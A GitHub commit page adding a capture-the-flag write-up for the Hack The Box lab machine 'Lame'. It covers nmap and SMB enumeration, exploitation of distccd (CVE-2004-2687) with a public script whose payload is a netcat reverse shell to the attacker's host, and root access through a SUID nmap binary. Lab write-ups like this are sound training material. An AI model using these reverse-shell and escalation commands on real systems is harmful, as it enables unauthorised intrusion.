-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
21bd0d8
commit 5cdee4a
Showing
11 changed files
with
72 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,70 @@ | ||
# HTB - Lame | ||
|
||
I decided to work on TJ Null's list of Hack The Box machines even though I'm not prepping for OSCP because I thought it might be a fun way to practice now that I have HTB VIP. The first machine on the list is Lame, so let's get to it! | ||
|
||
## Initial Foothold | ||
|
||
The first thing I did was run an initial Nmap scan with the following tags `-sC`, -`sV`, `-vv`, `-Pn` to use the default scripts, enumerate the services in the ports found, enable a verbose output and disable host discovery. I used `-oN` to save the ouput of the command (it's always a good idea to do so). The final command is `nmap -sC -sV 10.10.10.3 -vv -Pn -oN nmap/initial`. | ||
|
||
![Initial nmap scan](/images/Lame/nmap_initial.png) | ||
|
||
Nmap has found ports 21 (FTP), 22 (SSH), 139 and 445, which are related to smb. | ||
|
||
I decided to investigate these further but while doing that, I ran a more aggressive scan on all ports with tags `-A` and `-p-`: `nmap -A -p- -sC -sV 10.10.10.3 -vv -Pn -oN nmap/aggressive`. | ||
|
||
The first thing I took a look at was the FTP service where FTP anonymous could be used (login with `anonymous`, no password) however the directory seemed to be completely empty so I quickly moved on to looking at the smb services. | ||
|
||
I used `smbmap` to see what I could access: `smbmap -H 10.10.10.3` | ||
|
||
![Smbmap](/images/Lame/smbmap.png) | ||
|
||
The only share that I could take a look at was `tmp`, so I did so using `smbclient`: `smbclient \\\\10.10.10.3\\tmp`: | ||
|
||
![smbclient tmp list](/images/Lame/smbclient_tmp.png) | ||
|
||
Taking a look around, there wasn't much that I had access to that looked interesting, except maybe vgauthsvclog.txt.0: | ||
|
||
![vgauthsvclog.txt.0](/images/Lame/vgauthsvclog.txt.0.png) | ||
|
||
This is linked to the VMware Guest Authentication Service, I thought that this could be used to obtain access on the machine but since it looked like it could be a rabbit hole, I decided to first take a look at the output of my aggressive nmap scan which had the following new service: | ||
|
||
``` | ||
3632/tcp open distccd syn-ack distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) | ||
``` | ||
|
||
A quick google search showed that this service had a CVE on record. I used the following command to check if the service running on the machine is vulnerable to that CVE: `nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 -Pn -oN nmap/vuln`. | ||
|
||
![Nmap vulnerability check scan](/images/Lame/nmap_vuln.png) | ||
|
||
Since it's vulnerable, I looked for an exploit and found [one in python](https://github.com/galenlim/distcc-exploit-python). The only thing I needed to was change the line containing the payload to my host ip and the port I would be listening to with netcat. `payload = "nc <HOST> 1234 -e /bin/bash"`. I then ran a netcat listener on my attacking machine: `nc -lnvp 1234` and the exploit with `./exploit.py 10.10.10.3 3632` and this got me a shell. | ||
|
||
## Privilege escalation | ||
|
||
I used this following command to get an interative shell `python -c 'import pty; pty.spawn("/bin/bash")'` and found the user flag in `/home/makis`: | ||
|
||
![User flag location](/images/Lame/user_loc.png) | ||
|
||
I found 4 main directories in `/home`: | ||
|
||
- `ftp` -> empty | ||
|
||
- `makis` -> user flag and `.sudo_as_admin_successful` -> so we know it has used sudo before | ||
|
||
- `service` -> basically empty | ||
|
||
- `user`: | ||
|
||
`.ssh` -> looks interesting but we don't have reading access | ||
|
||
At this point, I realised that I could enter `/root` and list its files: | ||
|
||
![Files in root directory](/images/Lame/root_ls.png) | ||
|
||
A couple things looked interesting but it didn't seem like I had enough access to any of them to do something useful so I decided to look for SUID binaries in the machine with the following command: `find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o- -perm -2000 -o- -perm -6000` | ||
|
||
![SUID binaries](/images/Lame/suid.png) | ||
|
||
`/usr/bin/nmap` jumped out to me and by running `nmap --interactive` and then running `!sh`, I landed a root shell. I was then able to read the `/root/root.txt` which is the final flag: | ||
|
||
![Root through namp](/images/Lame/root.png) | ||
|
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.